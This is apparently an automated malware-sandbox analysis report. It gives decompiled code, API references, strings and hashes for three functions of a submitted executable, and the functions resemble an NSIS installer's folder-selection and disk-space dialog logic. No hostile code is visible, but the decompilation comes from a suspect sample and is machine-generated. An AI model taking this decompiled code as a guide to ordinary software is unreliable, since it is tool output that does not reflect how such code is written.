											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404790
0x00404796
0x00404798
0x0040479e
0x004047a4
0x004047b1
0x004047ba
0x004047bd
0x004047c0
0x004049e8
0x004049ef
0x00404a03
0x004049f1
0x004049f3
0x004049f6
0x004049f7
0x004049fe
0x004049fe
0x00404a0f
0x00404a1d
0x00404a20
0x00404a36
0x00404aae
0x00404ab1
0x00404ab3
0x00404abd
0x00404acb
0x00404acb
0x00404acd
0x00404ad7
0x00404add
0x00404afe
0x00404adf
0x00404aec
0x00404aec
0x00404add
0x00404ad7
0x00000000
0x00404ab1
0x00404a3b
0x00404a46
0x00404a4b
0x00404a52
0x00404a59
0x00404a63
0x00404a63
0x00404a67
0x00404a6c
0x00404a71
0x00404a87
0x00404a73
0x00404a73
0x00404a7b
0x00404a82
0x00404a7d
0x00404a7d
0x00404a7d
0x00404a7b
0x00404a8b
0x00404a8d
0x00404a9b
0x00404a9c
0x00404aa8
0x00404aab
0x00404aab
0x00404a6c
0x00000000
0x00404a59
0x00404a3d
0x00404a44
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b01
0x00404b01
0x00404b08
0x00404b7c
0x00404b83
0x00404b8f
0x00404b8f
0x00404b98
0x00404b9a
0x00404ba1
0x00404ba4
0x00404ba4
0x00404baa
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc6
0x00404bc6
0x00404bd3
0x00404d20
0x00404d27
0x00404d44
0x00404d4a
0x00404d5c
0x00404d5c
0x00000000
0x00404bd9
0x00404bdb
0x00404be3
0x00404be7
0x00404be7
0x00404bef
0x00404c30
0x00404c32
0x00404c42
0x00404c45
0x00404c4a
0x00404c51
0x00404c54
0x00404cf6
0x00404cfc
0x00404d0a
0x00404d1b
0x00404d1b
0x00000000
0x00404d0a
0x00404c5a
0x00404c5d
0x00404c63
0x00404c68
0x00404c6a
0x00404c6c
0x00404c72
0x00404c79
0x00404c7e
0x00404c85
0x00404c88
0x00404c88
0x00404c8f
0x00404c9b
0x00404c9f
0x00404ca1
0x00404ca1
0x00404c91
0x00404c93
0x00404c93
0x00404cc1
0x00404ccd
0x00404cdc
0x00404cdc
0x00404cde
0x00404ce1
0x00404cea
0x00000000
0x00404bf1
0x00404bfc
0x00404bff
0x00404c04
0x00404c06
0x00404c0a
0x00404c1a
0x00404c24
0x00404c26
0x00404c29
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c0c
0x00404c0c
0x00404c12
0x00404c14
0x00404c14
0x00404c15
0x00404c16
0x00000000
0x00404c0c
0x00404bef
0x00404bd3
0x00404b10
0x00000000
0x00404b26
0x00404b30
0x00404b35
0x00000000
0x00000000
0x00404b47
0x00404b4c
0x00404b58
0x00404b58
0x00404b5a
0x00404b69
0x00404b6b
0x00404b72
0x00404b75
0x00000000
0x00404b75
0x00404b10
0x004047c6
0x004047cb
0x004047d5
0x004047d6
0x004047df
0x004047ea
0x004047f5
0x004047fb
0x00404809
0x0040481e
0x00404823
0x0040482e
0x00404837
0x0040484c
0x0040485d
0x0040486a
0x0040486a
0x0040486f
0x00404875
0x00404877
0x0040487a
0x0040487f
0x00404884
0x00404886
0x00404886
0x004048a6
0x004048a6
0x004048a8
0x004048a9
0x004048ae
0x004048b1
0x004048b4
0x004048b8
0x004048bd
0x004048c2
0x004048c6
0x004048cb
0x004048d0
0x004048d2
0x004048da
0x004049a4
0x004049b7
0x00000000
0x004048e0
0x004048e3
0x004048e6
0x004048e9
0x004048e9
0x004048ef
0x004048f5
0x004048f8
0x004048fe
0x004048ff
0x00404904
0x0040490d
0x00404914
0x00404917
0x0040491a
0x0040491d
0x00404959
0x00404982
0x0040495b
0x00404968
0x00404968
0x0040491f
0x00404922
0x00404931
0x0040493b
0x00404943
0x0040494a
0x00404952
0x00404952
0x0040491d
0x00404988
0x00404989
0x00404995
0x00404995
0x004049a2
0x004049bd
0x004049c1
0x004049de
0x004049e3
0x004049e6
0x00000000
0x004049c3
0x004049c8
0x004049d1
0x00404d5e
0x00404d70
0x00404d70
0x004049c1
0x00000000
0x004049a2
0x004048da

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32 ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32 ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

N, xrefs: 00404A06
, xrefs: 00404D34
M, xrefs: 00404922

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040427b
0x00404282
0x0040428e
0x0040429c
0x004042a4
0x004042a8
0x004042ae
0x004042ae
0x004042ba
0x0040432e
0x00404335
0x0040440a
0x00404411
0x00404420
0x00404420
0x00404424
0x0040442a
0x00404437
0x00404439
0x00404439
0x00404447
0x0040444c
0x0040444f
0x00404456
0x00404459
0x00404490
0x00404492
0x00404498
0x0040449f
0x004044a1
0x004044a1
0x004044bd
0x004044f9
0x00000000
0x004044bf
0x004044c2
0x004044d6
0x004044d8
0x00000000
0x004044d8
0x0040445b
0x0040445f
0x0040448e
0x0040448e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404461
0x00404461
0x0040446e
0x00404473
0x00000000
0x00000000
0x00404477
0x00404479
0x00404479
0x00404484
0x00404487
0x0040448c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040448c
0x004044e7
0x004044ee
0x004044f5
0x004044fc
0x004044fc
0x00404501
0x00404503
0x0040450b
0x00404511
0x00404511
0x00404521
0x0040452b
0x00404533
0x00404549
0x00404535
0x00404539
0x00404539
0x00404533
0x0040454e
0x00404553
0x00404558
0x00404561
0x00404561
0x0040456a
0x0040456c
0x0040456c
0x00404578
0x00404580
0x0040458a
0x0040458a
0x0040458f
0x00000000
0x0040458f
0x00404459
0x00404413
0x0040441a
0x00000000
0x00000000
0x00000000
0x0040441a
0x0040433b
0x00404341
0x0040435b
0x00404360
0x0040436a
0x00404371
0x00404380
0x00404383
0x00404386
0x0040438d
0x00404395
0x00404398
0x0040439c
0x004043a3
0x004043ab
0x00404403
0x004043ad
0x004043ae
0x004043b5
0x004043bf
0x004043c7
0x004043d4
0x004043e8
0x004043ec
0x004043ec
0x004043e8
0x004043f1
0x004043fc
0x004043fc
0x004043ab
0x00000000
0x00404360
0x0040434e
0x00000000
0x00000000
0x00404354
0x00000000
0x004042bc
0x004042bc
0x004042c8
0x004042d2
0x004042df
0x004042df
0x004042e5
0x004042ee
0x004042f7
0x004042fa
0x004042fd
0x00404305
0x00404308
0x0040430b
0x00404313
0x0040431a
0x00404321
0x00404595
0x004045a7
0x004045a7
0x0040432c
0x00000000
0x0040432c

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(ytxithcebq,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,ytxithcebq), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
A, xrefs: 0040439C
ytxithcebq, xrefs: 004043DA, 004043DF, 004043EA

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$ytxithcebq
API String ID: 2246997448-2531879553
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

0x00405aa7
0x00405aa7
0x00405aa7
0x00405aad
0x00405ab2
0x00405ac3
0x00405ac3
0x00405ace
0x00405ad0
0x00405ad5
0x00405ad8
0x00405ad9
0x00405ae0
0x00405ae2
0x00405ae8
0x00405aeb
0x00405aeb
0x00405cc0
0x00405cc0
0x00405cc4
0x00000000
0x00000000
0x00405af8
0x00405afe
0x00000000
0x00000000
0x00405b04
0x00405b05
0x00405b08
0x00405b0b
0x00405cb3
0x00405cbd
0x00405cbf
0x00405cbf
0x00405cb5
0x00405cb7
0x00405cb9
0x00405cba
0x00405cba
0x00000000
0x00405cb3
0x00405b11
0x00405b15
0x00405b1a
0x00405b29
0x00405b2c
0x00405b2e
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00405b3f
0x00405b42
0x00405c5d
0x00405c60
0x00405c90
0x00405c93
0x00405c98
0x00405c9c
0x00405c9c
0x00405ca1
0x00405ca2
0x00405ca7
0x00405caa
0x00405cac
0x00000000
0x00405cac
0x00405c62
0x00405c65
0x00405c7a
0x00405c81
0x00405c67
0x00405c6e
0x00405c6e
0x00405c89
0x00405c8c
0x00405c55
0x00405c56
0x00405c56
0x00000000
0x00405c8c
0x00405b4a
0x00405b4b
0x00405b51
0x00405b53
0x00405b6d
0x00405b6d
0x00405b74
0x00405b74
0x00405b7b
0x00405b7f
0x00405b7f
0x00405b80
0x00405b82
0x00405bbb
0x00405bbe
0x00405bce
0x00405bd1
0x00405bd9
0x00405bdf
0x00405bdf
0x00405c3b
0x00405c3b
0x00405c3d
0x00000000
0x00000000
0x00405be3
0x00405bea
0x00405beb
0x00405bed
0x00405c07
0x00405c15
0x00405c1b
0x00405c1d
0x00405c38
0x00405c38
0x00405c38
0x00000000
0x00405c38
0x00405c23
0x00405c2e
0x00405c34
0x00405c36
0x00000000
0x00000000
0x00000000
0x00405c36
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405c01
0x00405c03
0x00405c05
0x00000000
0x00000000
0x00000000
0x00405c05
